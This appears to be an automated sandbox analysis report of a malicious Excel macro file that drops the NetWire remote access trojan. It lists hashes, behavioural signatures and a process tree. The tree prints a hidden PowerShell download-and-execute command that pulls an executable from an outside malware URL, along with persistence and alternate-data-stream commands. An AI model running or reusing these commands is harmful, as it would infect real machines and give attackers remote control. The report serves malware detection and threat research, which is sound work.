Analysis
-
max time kernel
135s -
max time network
130s -
platform
windows10_x64 -
resource
win10 -
submitted
29-06-2020 19:51
Static task
static1
Behavioral task
behavioral1
Sample
PO29062020.xlsm
Resource
win7v200430
General
-
Target
PO29062020.xlsm
-
Size
407KB
-
MD5
2958c347433029ff3d06f2e3f32a735b
-
SHA1
b729fbe5d5642ca5987db47352b134797852d097
-
SHA256
d70d7499eec43adaa9d908f4df45fbb064a53e488f765ec5a5cb99baf1285389
-
SHA512
0ff681ca3254a6ae552b91a9017aa660725e148c35adaebc830f7f37778d8a1f05fe64681fbc9732a7e6c6992c325f2c7c14eac20f813e78a15de8f28bba28d6
Malware Config
Extracted
http://longi.ca/wdfr.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3608 3832 powershell.exe EXCEL.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
putty.exedescription pid process target process PID 416 set thread context of 1568 416 putty.exe whdhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeputty.exedescription pid process Token: SeDebugPrivilege 3608 powershell.exe Token: SeDebugPrivilege 416 putty.exe -
NTFS ADS 1 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\FolderN\name.exe:Zone.Identifier cmd.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3832 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeputty.exepid process 3608 powershell.exe 3608 powershell.exe 3608 powershell.exe 416 putty.exe 416 putty.exe -
NetWire RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1568-8-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/1568-11-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE 3832 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEpowershell.exeputty.exedescription pid process target process PID 3832 wrote to memory of 3608 3832 EXCEL.EXE powershell.exe PID 3832 wrote to memory of 3608 3832 EXCEL.EXE powershell.exe PID 3608 wrote to memory of 416 3608 powershell.exe putty.exe PID 3608 wrote to memory of 416 3608 powershell.exe putty.exe PID 3608 wrote to memory of 416 3608 powershell.exe putty.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 1568 416 putty.exe whdhost.exe PID 416 wrote to memory of 2396 416 putty.exe cmd.exe PID 416 wrote to memory of 2396 416 putty.exe cmd.exe PID 416 wrote to memory of 2396 416 putty.exe cmd.exe PID 416 wrote to memory of 2384 416 putty.exe cmd.exe PID 416 wrote to memory of 2384 416 putty.exe cmd.exe PID 416 wrote to memory of 2384 416 putty.exe cmd.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 3608 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
putty.exewhdhost.exepid process 416 putty.exe 1568 whdhost.exe -
Drops startup file 1 IoCs
Processes:
putty.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.exe.lnk putty.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO29062020.xlsm"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://longi.ca/wdfr.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\putty.exe"C:\Users\Admin\AppData\Local\Temp\putty.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\whdhost.exe"C:\Users\Admin\AppData\Local\Temp\whdhost.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "C:/Users/Admin/AppData/Local/Temp/putty.exe" "%temp%\FolderN\name.exe" /Y4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo [zoneTransfer]ZoneID = 2 > %temp%\FolderN\name.exe:Zone.Identifier4⤵
- NTFS ADS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\putty.exe
-
C:\Users\Admin\AppData\Local\Temp\putty.exe
-
C:\Users\Admin\AppData\Local\Temp\whdhost.exe
-
memory/416-5-0x0000000000000000-mapping.dmp
-
memory/1568-9-0x000000000040242D-mapping.dmp
-
memory/1568-8-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/1568-11-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/2384-13-0x0000000000000000-mapping.dmp
-
memory/2396-12-0x0000000000000000-mapping.dmp
-
memory/3608-4-0x0000000000000000-mapping.dmp